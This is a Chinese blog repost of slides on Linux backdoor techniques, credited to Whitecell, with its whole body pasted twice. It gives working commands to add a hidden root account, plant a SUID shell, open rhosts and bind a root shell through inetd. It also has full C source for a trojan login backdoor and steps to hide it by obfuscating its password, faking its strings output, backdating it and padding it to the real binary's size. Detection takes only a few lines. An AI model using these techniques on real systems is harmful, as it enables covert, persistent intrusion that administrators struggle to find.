Linux后门技术及实践
2005-02-01 17:14
218 查看
Mail:e4gle@whitecell.org
Page:http://www.whitecell.org
Copyright: Whitecell Security Systems
概述
后门简介
常用后门技术
后门的检测
实例讲解:login后门
后门简介
入侵者完全控制系统后,为方便下次进入
而采用的一种技术。
一般通过修改系统配置文件和安装第三方
后门工具来实现。
具有隐蔽性,能绕开系统日志,不易被系
统管理员发现等特点。
常用后门技术
增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts + +
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM)
增加超级用户
# echo "e4gle:x:0:0::/:/bin/sh" >>
/etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
/etc/shadow
如果系统不允许uid=0的用户远程登录,
还需要增加一个普通用户账号。
破解/嗅探用户密码
获得shadow文件后,用John the Ripper
工具破解薄弱的用户密码。
安装sniffit等嗅探工具,监听telnet、ftp等
端口,收集用户密码。
放置SUID Shell
# cp /bin/bash /dev/.rootshell
# chmod u+s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即
可获得一个root权限的shell。
rhosts + +
# echo "+ +" > /.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。
利用系统服务程序
修改/etc/inetd.conf,
daytime stream tcp nowait /bin/sh sh -I
用trojan程序替换in.telnetd、in.rexecd等
inted的服务程序
重定向login程序
TCP/UDP/ICMP Shell
BindShell,大部分是基于TCP/UDP协议
的网络服务程序,在高端口监听,很容易
被发现。
Ping Backdoor,通过ICMP包激活后门,
形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火
墙。
Crontab定时任务
通过Crontab程序调度已安装的后门程序
定时运行,一般在深夜时段,是系统管理
员不在线的时间。
共享库文件
在共享库中嵌入后门函数
使用后门口令激活Shell,获得权限
能够躲避系统管理员对二进制文件本身的
校验
工具包rootkit
包含一系列系统及后门工具:
- 清除日志中的登录记录
- 伪装校验和
- 替换netstat、ps等网络工具
- 后门登录程序
易于安装和使用
可装载内核模块(LKM)
LKM:Loadable Kernel Modules
动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进
程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
著名的LKM包有adore和knark。
后门的检测
以自己的经验,结合特定的工具,手工作
一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网
络连接。
实例:login后门
入侵者先把原始的/bin/login备份,再用一
段程序替换/bin/login。入侵者telnet登录
进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个
Shell;如果是普通用户登录,将会重定
向到原始的login文件,来处理正常的登
录。
最简单的login后门ulogin.c源代码如下:
实例:login后门
#include <stdio.h>
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins"
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
利用后门登录
首先Telnet服务是打开的,在自己机器上:
bash$ export DISPLAY=passWORD
bash$ telnet victim.com
Trying xxx.xxx.xxx.xxx...
Connected to victim.com (xxx.xxx.xxx.xxx).
Escape character is '^]'.
% _
strings命令
strings命令能够打印出二进制文件中的可显示
字符串,用于刚才的ulogin程序:
bash$ strings ulogin
/lib/ld-linux.so.2
..............
DISPLAY
/sbin/logins
passWORD
/bin/csh
加密后门密码(1)
1,采用DES算法,即crypt( )函数,编写gen.c程序:
#include <unistd.h>
main(int argc, char *argv[])
{
if (argc != 3) {
printf("usage: %s <password> <salt>/n", argv[0]);
exit(1);
}
printf("%s/n", crypt(argv[1], argv[2]));
}
加密后门密码(1)
2、编译为gen,执行./gen hack ui,得到的shadow结
果为UiVqMWvDrIQjA。
3、修改后门源程序ulogin.c:
-- 以密文形式的密码代替ulogin.c中define的宏
PASSWORD值。
-- 如果后门密码正确,直接给出Shell:
if (!strcmp(PASSWORD, crypt(display,PASSWORD)))
{
system(SHELL);
exit(1);
}
用strings命令只能看到加密过的密码。
加密后门密码(2)
采用异或(XOR)算法
以十六进制方式表示字符串,以达到non-
printable的效果
1、编码程序encode.c如下:
加密后门密码(2)
char magic[]="/x71/x67/x6d/x7a/x65/x61/x7a";
char *de(char *str,char *key)
{
int i=0,j=0,len;
len=strlen(key);
while(str[i] != '/0') {
str[i]^=key[j];
j++;
if(j==len) j=0;
i++;
}
return str;
}
void display(char *str)
{
int i;
for(i=0;i<strlen(str);i++) printf("//x%x",str[i]);
printf("/n");
}
main()
{
char gets[100], *ptr;
ptr=gets;
scanf ("%s",ptr);
de(ptr,magic);display(ptr);
}
加密后门密码(2)
2、编译程序encode,依次执行得到关键字符
串与magic串异或后的结果,例如原始login的文
件名/sbin/xlogin,经过异或后为:
/x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x13/xb
3、在后门源代码中这样定义:
Char
login[]="/x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x
13/xb";
然后插入异或函数char *de()结合同一magic
串,就能判断出正确的后门密码。
用strings命令看不到密码、路径等字符串了。
最后的修饰(1)
使后门程序ulogin的strings输出类似于正
常login的strings输出,做法为:
在ulogin.c代码中增加一个字符串数组
char strings[] ="";,在引号中填入正常
login程序的strings输出结果。
以假乱真,增加迷惑性。
最后的修饰(2)
调整后门程序的文件日期、大小等属性:
1、日期
# ls -l /sbin/xlogin
-r-sr-xr-x root root 19300 Feb 11 1998
/sbin/xlogin
# touch -t 199802110000 ulogin
# _
最后的修饰(2)
2、调整大小
# ls -l ulogin /sbin/xlogin
-r-sr-xr-x root root 7542 Feb 11 1998 ulogin
-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
# bc
19300-7542
11758
# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
1+0 records in
1+0 records out
11758 bytes transferred in 0.000379 secs (31016746
bytes/sec)
# cat /tmp/t >> ulogin
Login后门的检测
使用命令md5sum对现有/bin/login文件作
校验,与以前的值作比较。
使用Red Hat Linux的RPM校验:
# rpm -V util-linux
在入侵者已经利用后门登录的情况下,
who是看不到用户的,查看系统进程,查
找login -h xxx.xxx.xxx.xxx的字样。
Page:http://www.whitecell.org
Copyright: Whitecell Security Systems
概述
后门简介
常用后门技术
后门的检测
实例讲解:login后门
后门简介
入侵者完全控制系统后,为方便下次进入
而采用的一种技术。
一般通过修改系统配置文件和安装第三方
后门工具来实现。
具有隐蔽性,能绕开系统日志,不易被系
统管理员发现等特点。
常用后门技术
增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts + +
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM)
增加超级用户
# echo "e4gle:x:0:0::/:/bin/sh" >>
/etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
/etc/shadow
如果系统不允许uid=0的用户远程登录,
还需要增加一个普通用户账号。
破解/嗅探用户密码
获得shadow文件后,用John the Ripper
工具破解薄弱的用户密码。
安装sniffit等嗅探工具,监听telnet、ftp等
端口,收集用户密码。
放置SUID Shell
# cp /bin/bash /dev/.rootshell
# chmod u+s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即
可获得一个root权限的shell。
rhosts + +
# echo "+ +" > /.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。
利用系统服务程序
修改/etc/inetd.conf,
daytime stream tcp nowait /bin/sh sh -I
用trojan程序替换in.telnetd、in.rexecd等
inted的服务程序
重定向login程序
TCP/UDP/ICMP Shell
BindShell,大部分是基于TCP/UDP协议
的网络服务程序,在高端口监听,很容易
被发现。
Ping Backdoor,通过ICMP包激活后门,
形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火
墙。
Crontab定时任务
通过Crontab程序调度已安装的后门程序
定时运行,一般在深夜时段,是系统管理
员不在线的时间。
共享库文件
在共享库中嵌入后门函数
使用后门口令激活Shell,获得权限
能够躲避系统管理员对二进制文件本身的
校验
工具包rootkit
包含一系列系统及后门工具:
- 清除日志中的登录记录
- 伪装校验和
- 替换netstat、ps等网络工具
- 后门登录程序
易于安装和使用
可装载内核模块(LKM)
LKM:Loadable Kernel Modules
动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进
程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
著名的LKM包有adore和knark。
后门的检测
以自己的经验,结合特定的工具,手工作
一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网
络连接。
实例:login后门
入侵者先把原始的/bin/login备份,再用一
段程序替换/bin/login。入侵者telnet登录
进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个
Shell;如果是普通用户登录,将会重定
向到原始的login文件,来处理正常的登
录。
最简单的login后门ulogin.c源代码如下:
实例:login后门
#include <stdio.h>
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins"
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
利用后门登录
首先Telnet服务是打开的,在自己机器上:
bash$ export DISPLAY=passWORD
bash$ telnet victim.com
Trying xxx.xxx.xxx.xxx...
Connected to victim.com (xxx.xxx.xxx.xxx).
Escape character is '^]'.
% _
strings命令
strings命令能够打印出二进制文件中的可显示
字符串,用于刚才的ulogin程序:
bash$ strings ulogin
/lib/ld-linux.so.2
..............
DISPLAY
/sbin/logins
passWORD
/bin/csh
加密后门密码(1)
1,采用DES算法,即crypt( )函数,编写gen.c程序:
#include <unistd.h>
main(int argc, char *argv[])
{
if (argc != 3) {
printf("usage: %s <password> <salt>/n", argv[0]);
exit(1);
}
printf("%s/n", crypt(argv[1], argv[2]));
}
加密后门密码(1)
2、编译为gen,执行./gen hack ui,得到的shadow结
果为UiVqMWvDrIQjA。
3、修改后门源程序ulogin.c:
-- 以密文形式的密码代替ulogin.c中define的宏
PASSWORD值。
-- 如果后门密码正确,直接给出Shell:
if (!strcmp(PASSWORD, crypt(display,PASSWORD)))
{
system(SHELL);
exit(1);
}
用strings命令只能看到加密过的密码。
加密后门密码(2)
采用异或(XOR)算法
以十六进制方式表示字符串,以达到non-
printable的效果
1、编码程序encode.c如下:
加密后门密码(2)
char magic[]="/x71/x67/x6d/x7a/x65/x61/x7a";
char *de(char *str,char *key)
{
int i=0,j=0,len;
len=strlen(key);
while(str[i] != '/0') {
str[i]^=key[j];
j++;
if(j==len) j=0;
i++;
}
return str;
}
void display(char *str)
{
int i;
for(i=0;i<strlen(str);i++) printf("//x%x",str[i]);
printf("/n");
}
main()
{
char gets[100], *ptr;
ptr=gets;
scanf ("%s",ptr);
de(ptr,magic);display(ptr);
}
加密后门密码(2)
2、编译程序encode,依次执行得到关键字符
串与magic串异或后的结果,例如原始login的文
件名/sbin/xlogin,经过异或后为:
/x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x13/xb
3、在后门源代码中这样定义:
Char
login[]="/x5e/x14/xf/x13/xb/x4e/x2/x1d/x8/xa/x
13/xb";
然后插入异或函数char *de()结合同一magic
串,就能判断出正确的后门密码。
用strings命令看不到密码、路径等字符串了。
最后的修饰(1)
使后门程序ulogin的strings输出类似于正
常login的strings输出,做法为:
在ulogin.c代码中增加一个字符串数组
char strings[] ="";,在引号中填入正常
login程序的strings输出结果。
以假乱真,增加迷惑性。
最后的修饰(2)
调整后门程序的文件日期、大小等属性:
1、日期
# ls -l /sbin/xlogin
-r-sr-xr-x root root 19300 Feb 11 1998
/sbin/xlogin
# touch -t 199802110000 ulogin
# _
最后的修饰(2)
2、调整大小
# ls -l ulogin /sbin/xlogin
-r-sr-xr-x root root 7542 Feb 11 1998 ulogin
-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
# bc
19300-7542
11758
# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
1+0 records in
1+0 records out
11758 bytes transferred in 0.000379 secs (31016746
bytes/sec)
# cat /tmp/t >> ulogin
Login后门的检测
使用命令md5sum对现有/bin/login文件作
校验,与以前的值作比较。
使用Red Hat Linux的RPM校验:
# rpm -V util-linux
在入侵者已经利用后门登录的情况下,
who是看不到用户的,查看系统进程,查
找login -h xxx.xxx.xxx.xxx的字样。
相关文章推荐
- Linux后门技术及实践
- 入门———— Linux后门技术及实践 20160616
- 黑客高级技巧之Linux后门技术及实践
- 黑客高级技巧之Linux后门技术及实践
- 欢迎报名参加CSDN云计算俱乐部上海“hadoop技术开发与应用实践分享会”
- 地址已经被使用——Address already in use(纠正《后台开发:核心技术于应用实践》书中的错误)
- SaltStack技术入门与实践
- 互联网企业高并发解决方案,高可用可扩展网站技术实践
- react技术栈实践(2)
- 互联网高可用架构技术实践
- 网易的Spark技术实践
- fir.im 持续集成技术实践
- JNI技术实践小结--原理分析和详细步骤截图说明
- Android Hook View技术实践
- 淘宝双11技术实践:tomcat并行类加载
- 网站运维技术与实践之测试评估
- 技术与架构,解析如何将大数据最快落地到实践
- NET网络编程与I/O技术实践
- Michael Jordan、BAT、CreditX探讨大数据技术的前沿进展和实践应用
- Redis集群技术及Codis实践